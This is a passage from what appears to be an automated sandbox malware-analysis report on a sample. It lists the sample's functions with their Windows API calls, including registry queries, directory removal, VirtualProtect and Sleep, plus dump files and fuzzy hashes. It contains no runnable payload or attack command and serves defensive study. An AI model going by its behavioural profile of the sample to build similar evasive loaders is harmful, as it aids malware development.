                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalEnterSection__lock
                                                                                                                                              • String ID: @bE$@bE$LmE
                                                                                                                                              • API String ID: 238394327-2432022147
                                                                                                                                              • Opcode ID: a7362febf858d49887ac4fd0a0a794e3c4a9f89c7bf4e2645289f9b2683df8dd
                                                                                                                                              • Instruction ID: e40cd25d26dbb6555db724202a02cf2ae53cf0c6892a069b9dabf880c229dd93
                                                                                                                                              • Opcode Fuzzy Hash: a7362febf858d49887ac4fd0a0a794e3c4a9f89c7bf4e2645289f9b2683df8dd
                                                                                                                                              • Instruction Fuzzy Hash: A541FBB1B117218FC7A0DF69E88065EB7F0BB08314792492FE959D7751DB78A881CF09
                                                                                                                                              Function 004164D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65registryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00413B40: LoadLibraryA.KERNEL32 ref: 00413B5A
                                                                                                                                                • Part of subcall function 00413B40: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00413B6A
                                                                                                                                                • Part of subcall function 00413B40: GetSystemDirectoryA.KERNEL32(0045DAF8,00000104), ref: 00413B95
                                                                                                                                                • Part of subcall function 00413B40: GetWindowsDirectoryA.KERNEL32(0045DD08,00000104), ref: 00413BA5
                                                                                                                                                • Part of subcall function 00413B40: GetTempPathA.KERNEL32(00000104,0045DE10), ref: 00413BB5
                                                                                                                                              • RegOpenKeyExA.ADVAPI32 ref: 0041653A
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,Version,00000000,00000000,?,00000100), ref: 00416562
                                                                                                                                              Strings
                                                                                                                                              • SOFTWARE\Microsoft\Active Setup\Installed Components\{D27CDB6E-AE6D-11cf-96B8-444553540000}, xrefs: 00416525
                                                                                                                                              • Version, xrefs: 00416554
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Directory$AddressLibraryLoadOpenPathProcQuerySystemTempValueWindows
                                                                                                                                              • String ID: SOFTWARE\Microsoft\Active Setup\Installed Components\{D27CDB6E-AE6D-11cf-96B8-444553540000}$Version
                                                                                                                                              • API String ID: 3927907489-1332029265
                                                                                                                                              • Opcode ID: 9252eca1604ed86113a6410666951e3d9899bb3435c16dbf6c7682639952dafd
                                                                                                                                              • Instruction ID: 2c3280e8fd186b36745d7fe58343f886ef13101444831185cebde92ec6972ae0
                                                                                                                                              • Opcode Fuzzy Hash: 9252eca1604ed86113a6410666951e3d9899bb3435c16dbf6c7682639952dafd
                                                                                                                                              • Instruction Fuzzy Hash: 5E21F371148341AFD314CF14C851BEBB7E8FB99744F104A1DF5A9832D0EB78A548CB56
                                                                                                                                              Function 00414E67 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 00414EF1
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00414F00
                                                                                                                                              • RemoveDirectoryA.KERNEL32(0000005C), ref: 00414F0E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$CloseDirectoryFileNextRemove
                                                                                                                                              • String ID: \*.*
                                                                                                                                              • API String ID: 2004183241-1173974218
                                                                                                                                              • Opcode ID: ac6806ff917ffb584945b3d21e5ba2d1ccc03283bf577d30b185a3c62fe6ba3e
                                                                                                                                              • Instruction ID: 9c89db226a464595a1456a08dba5ac67963ce04dc153f15b353361ca2e9a56d0
                                                                                                                                              • Opcode Fuzzy Hash: ac6806ff917ffb584945b3d21e5ba2d1ccc03283bf577d30b185a3c62fe6ba3e
                                                                                                                                              • Instruction Fuzzy Hash: F711EB751087828BC721CB28A8547EBFBD9FFD6306F144929EDC587301DB35A889C755
                                                                                                                                              Function 00416B50 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetLastError.KERNEL32 ref: 00416B9A
                                                                                                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 00416BB6
                                                                                                                                              • MessageBoxA.USER32(00000000,?,DirectX Error,00000000), ref: 00416BCC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Message$ErrorFormatLast
                                                                                                                                              • String ID: DirectX Error
                                                                                                                                              • API String ID: 3971115935-1449601957
                                                                                                                                              • Opcode ID: e42ac2ce9476a126deb7f06afa875e21e8b1d8dd5084b04630a3d7ee1d926943
                                                                                                                                              • Instruction ID: 00734949432f92e12728b15547f2c9266f1449dcf60645d6a7a156eb7abf3a75
                                                                                                                                              • Opcode Fuzzy Hash: e42ac2ce9476a126deb7f06afa875e21e8b1d8dd5084b04630a3d7ee1d926943
                                                                                                                                              • Instruction Fuzzy Hash: 9F018071304310ABE710DFA59C49F6B77ACEF86B15F11852DFA00CA280D674E8008669
                                                                                                                                              Function 0042C2D4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32,00424B26), ref: 0042C2D9
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0042C2E9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                              • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                              • API String ID: 1646373207-3105848591
                                                                                                                                              • Opcode ID: 02faec45ebebc9ea8088bb5ac7c7d7aefd1fe9434e9aaf4371285750a670add2
                                                                                                                                              • Instruction ID: 3010c939291e915eff1eb01b3b571670853061f70a44e764dbecd71da3a81d10
                                                                                                                                              • Opcode Fuzzy Hash: 02faec45ebebc9ea8088bb5ac7c7d7aefd1fe9434e9aaf4371285750a670add2
                                                                                                                                              • Instruction Fuzzy Hash: C2F01D30F40A1DD2DB001BE0BD4A26FBB78BB92746F9105E1D891A0094DF7884B4C25E
                                                                                                                                              Function 004317FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29libraryloaderCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,0044EAE0,00000010,004297E9,00000000,00000FA0,0044CDF0,00000008,00429851,?,?,?,00423F79,00000004,0044C938,0000000C), ref: 00431821
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 00431831
                                                                                                                                              Strings
                                                                                                                                              • InitializeCriticalSectionAndSpinCount, xrefs: 0043182B
                                                                                                                                              • kernel32.dll, xrefs: 0043181C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                              • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                                                                                              • API String ID: 1646373207-3733552308
                                                                                                                                              • Opcode ID: 7e93898ae70dbf0739adb7c3265fadd24f6ff0e0cb512f9bb8f0251e16c97f3e
                                                                                                                                              • Instruction ID: 4a45933a82aeb79599459cbe0f8cef8bbb669c532bc06b3cb3151a140fe0d406
                                                                                                                                              • Opcode Fuzzy Hash: 7e93898ae70dbf0739adb7c3265fadd24f6ff0e0cb512f9bb8f0251e16c97f3e
                                                                                                                                              • Instruction Fuzzy Hash: 32F09A70640306AADB54AFA69C0679E3AA0BB08349F20983EE411E52B0DFBCC5108B1D
                                                                                                                                              Function 0043127E Relevance: 6.2, APIs: 4, Instructions: 167fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ReadFile.KERNEL32(?,?,00000000,?,00000000,?,00000400,?), ref: 004312F8
                                                                                                                                              • GetLastError.KERNEL32 ref: 00431302
                                                                                                                                              • ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 004313CB
                                                                                                                                              • GetLastError.KERNEL32 ref: 004313D5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFileLastRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1948546556-0
                                                                                                                                              • Opcode ID: fc517802bf9863005fcb3632d1bfaa85c075bd97ca757f21effb5126a677eff1
                                                                                                                                              • Instruction ID: 191bc55e6a285dc79099745201b46e499ca68c129fd5b025dbec7fdafe6e4a6e
                                                                                                                                              • Opcode Fuzzy Hash: fc517802bf9863005fcb3632d1bfaa85c075bd97ca757f21effb5126a677eff1
                                                                                                                                              • Instruction Fuzzy Hash: 6F61D930604385DFDB21CF58C884B9A7BF4BF1A304F14559BE8618B3A2D778D946CB1A
                                                                                                                                              Function 004015E1 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 150sleepCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00408060: VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                                • Part of subcall function 0042400B: __lock.LIBCMT ref: 00424029
                                                                                                                                                • Part of subcall function 0042400B: HeapFree.KERNEL32(00000000,?,0044C948,0000000C,0042981C,00000000,0044CDF0,00000008,00429851,?,?,?,00423F79,00000004,0044C938,0000000C), ref: 00424070
                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 004016EA
                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 004017C4
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Sleep$FreeHeapProtectVirtual__lock
